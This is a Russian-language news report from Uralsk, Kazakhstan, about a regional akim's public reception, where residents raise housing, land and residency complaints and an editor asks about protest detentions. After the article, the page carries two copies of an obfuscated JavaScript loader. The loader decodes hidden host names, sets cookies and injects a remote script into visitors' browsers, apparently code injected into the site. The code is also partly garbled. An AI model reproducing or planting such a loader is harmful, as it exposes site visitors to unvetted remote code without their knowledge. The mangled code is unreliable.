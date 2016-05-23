Сегодня, 23 мая, в 12.00 в здании партии "Нур Отан" аким ЗКО Алтай Кульгинов принял жителей области и ответил на их вопросы.
22 мая в пресс-службе акима ЗКО дали информацию о том, что для сбора предложений и разъяснения земельного законодательства в Уральске организовывается общественный прием граждан. Первый прием акима состоялся сегодня. Нужно отметить, что глава региона не ограничился во времени. Изначально было заявлено, что собрание продлится до 13.30. Однако собралось большое количество людей и аким принимал всех.
Практически у всех пришедших была одна и та же проблема - жилье. Кто жаловался, что стоит в очереди много лет, а жилье получить не может, кто-то сетовал, что не может получить участок под ИЖС, но Алтай Кульгинов ответил, что жилье выдается в порядке очереди и этот порядок нарушать нельзя. Были также и те, кто просил помочь в развитии бизнеса и даже переименовать поселок и район.
Аблай КОПЖАСАРОВ обратился к акиму с просьбой включить его в совет по земельной реформе. На это Алтай Кульгинов ответил, что каждую среду в 15.00 в большом зале областного маслихата проводится общественный совет, куда может он обратиться с предложением либо вопросом.
Также к акиму обратилась глава сельского хозяйства Елена Уланова.
- Возмущаются крестьяне, потому что им, живущим в сельской местности, не дают землю для работы. А без земли крестьянин в сельской местности никто. Он, конечно, может быть наемным работником, но работать в сельском хозяйстве и получать мизерную зарплату, как это будет. Потому что крестьянин, работая сам, может получить что-либо от этой земли и быть богатым. Когда человек сам на себя работает - он будет работать день и ночь. А сейчас крестьяне живут в сельской местности и не имеют земли, потому что ее заняли арендаторы. В тот период (90-е года - прим. автора) были очень большие нарушения. В 1995 году президент издал указ, и началась земельная реформа, каждый момент был расписан: как должна происходить регистрация. Но это все было проигнорировано. Поэтому у крестьян нет доверия, - обратилась Елена Уланова.
По словам главы крестьянского хозяйства, необходимо дать землю крестьянам, чтобы они могли на ней работать.
- Каждый крестьянин получил надел земельный бесплатно когда-то, но куда они делись? Вот говорят нужно развивать предпринимательство на селе, но как можно это делать, если у крестьян нет земли? А работник это равносильно рабу, - подытожила Елена УЛАНОВА
На это Алтай Кульгинов ответил, что в среду, 25 мая, пройдет общественный совет, куда предпринимателю нужно прийти и они выслушают ее предложения.
Кроме того, со своей проблемой обратилась и жительница села Березовка Дамиля Мурзалиева. Женщина рассказала, что давно живет в Березовке, но когда-то прописка была оформлена ошибочно и она не может прописаться там. Кроме того, на участке, который принадлежит ей, сейчас действует ТОО.
- Куда я только не обращалась. Почему у нас в Березовке прописано 1600 человек, из которых 200 точно не жители Березовки. А нас коренных жителей там не прописывают? Таких как я еще человек 10. Вот к примеру, там прописана няня Тусупкалиева (аким Бурлинского района - прим. автора), хотя она там не жила. И таких там много, - возмущенно рассказала Дамиля Мурзалиева. - Кроме того, я обращалась к заместителю акима Утегенову, но тот меня послал на три буквы, хотя он ровесник моего сына. И сказал не лезть, я даже боюсь теперь.
Алтай Кульгинов пообещал, что никто из тех, кто не является жителем Березовки, не получит жилье. Он попросил женщину предоставить список тех, кто не жил никогда в селе.
- Я с этим обязательно разберусь, - пообещал аким ЗКО.
С вопросом к акиму обратилась и редактор газеты "Уральская неделя" Тамара Еслямова.
- Я так поняла, что ближайшие родственники пришедших сегодня людей выходили в субботу в центр задать свои вопросы. У меня такой вопрос: "Можете ли вы принести извинение людям, которых больше тысячи совершенно безосновательно были задержаны в субботу полицейскими"? То есть это беспрецедентно для жителей ЗКО. Пожилые люди к нам обращаются, люди чувствуют себя униженными. Не хотите ли вы принести им извинения? - задала вопрос Тамара Еслямова.
- Есть закон. У меня нет данных, что больше тысячи человек было задержано. Вам нужно обратиться в правоохранительные органы. Для чего мы проводим общественный совет, для чего проводим прием граждан? Для того,чтобы донести информацию, что если есть предложения, то пусть приходят на общественный совет. Но призывать людей на незаконные действия - это неправильно. Разъяснять - это моя обязанность, поэтому мы проводим приемы граждан, встречи, общественный совет, чтобы все могли вынести свои предложения. Я вас прошу как жителя нашего города и руководителя СМИ правильно доводить информацию по разъяснению, а не дезинформировать, - ответил аким ЗКО.
NIF5toeqvfs
Фото Медета МЕДРЕСОВА
Видео Алтынбека МАЙКЕНОВА
// < ![CDATA[
// < !'),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(/+^])/g,"$1")+"=(*)"));return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "mgorod.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e,s(t)};f()}();
// ]]>
// < ![CDATA[
// < !'),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(/+^])/g,"$1")+"=(*)"));return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "mgorod.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e,s(t)};f()}();
// ]]>